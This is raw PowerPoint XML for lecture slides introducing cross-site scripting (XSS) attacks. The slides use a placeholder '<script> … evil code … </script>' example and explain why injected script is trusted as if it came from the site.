            <a:off x="993139" y="2031746"/>
            <a:ext cx="8240395" cy="4549775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="64135" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="505"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Attacks where input from one user is later output</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to  another </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>user, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>for example, a user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>includes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPts val="2750"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>evil code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPts val="3465"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Facebook, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Twitter,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Any supported script, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-160" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ActiveX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="171450" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="770"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Code is assumed to come from application on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>site,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>so </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trusted </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>same </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="310"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>reflection</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>code supplied </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-65" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>subsequently </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>displayed to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9145016" y="6731760"/>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15</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>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01138" y="1006855"/>
            <a:ext cx="6566662" cy="566822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-75" dirty="0" smtClean="0"/>
              <a:t>(XSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0" smtClean="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr spc="-5" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="2031746"/>
            <a:ext cx="8240395" cy="4549775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="64135" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="505"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Attacks where input from one user is later output</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to  another </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>user, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>for example, a user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>includes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPts val="2750"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>evil code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPts val="3465"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Facebook, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Twitter,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Any supported script, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-160" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ActiveX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="171450" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="770"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Code is assumed to come from application on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>site,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>so </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trusted </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>same </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="310"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>reflection</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>code supplied </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-65" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>subsequently </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>displayed to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9145016" y="6731760"/>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15</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338987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01138" y="1006855"/>
            <a:ext cx="6566662" cy="566822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-75" dirty="0" smtClean="0"/>
              <a:t>(XSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0" smtClean="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr spc="-5" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9145016" y="6731760"/>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15</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>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8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586486" y="2286000"/>
            <a:ext cx="8763000" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There are three main types of XSS attacks. These are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
